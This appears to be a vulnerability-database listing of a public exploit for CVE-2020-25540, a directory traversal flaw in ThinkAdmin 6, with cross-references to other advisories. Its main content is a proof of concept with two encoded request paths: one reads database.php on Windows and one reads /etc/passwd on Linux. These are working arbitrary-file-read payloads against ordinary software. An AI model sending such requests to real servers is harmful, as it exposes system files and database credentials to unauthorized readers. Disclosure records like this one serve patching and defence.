ThinkAdmin 6 Arbitrary File Read

🗓️ 15 Sep 2020 00:00:00Reported by HzllagaType

packetstorm🔗 packetstormsecurity.com👁 753 Views

ThinkAdmin 6 Arbitrary File Read CVE-2020-2554

Reporter	Title	Published	Views	Family All 16
GithubExploit	Exploit for Path Traversal in Thinkadmin	19 Oct 202009:56	–	githubexploit
Circl	CVE-2020-25540	23 Apr 202418:12	–	circl
CNVD	ThinkAdmin Directory Traversal Vulnerability	15 Sep 202000:00	–	cnvd
CVE	CVE-2020-25540	14 Sep 202012:22	–	cve
Cvelist	CVE-2020-25540	14 Sep 202012:22	–	cvelist
Dsquare	ThinkAdmin v6 File Disclosure	20 Sep 202000:00	–	dsquare
Exploit DB	ThinkAdmin 6 - Arbitrarily File Read	15 Sep 202000:00	–	exploitdb
Github Security Blog	ThinkAdmin directory traversal vulnerability	24 May 202217:28	–	github
Nuclei	ThinkAdmin 6 - Local File Inclusion	3 Jun 202606:04	–	nuclei
NVD	CVE-2020-25540	14 Sep 202013:15	–	nvd

`# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read  
# Google Dork: N/A  
# Date: 2020-09-14  
# Exploit Author: Hzllaga  
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/  
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a  
# Version: v6 <= 2020.08.03.01  
# Tested on: PHP7.4.7,Apache  
# CVE : CVE-2020-25540  
  
PoC:  
On Windows read database.php payload:  
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34  
  
On Linux read /etc/passwd payload:  
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s  
`

15 Sep 2020 00:00Current

0.8Low risk

Vulners AI Score0.8

EPSS0.93767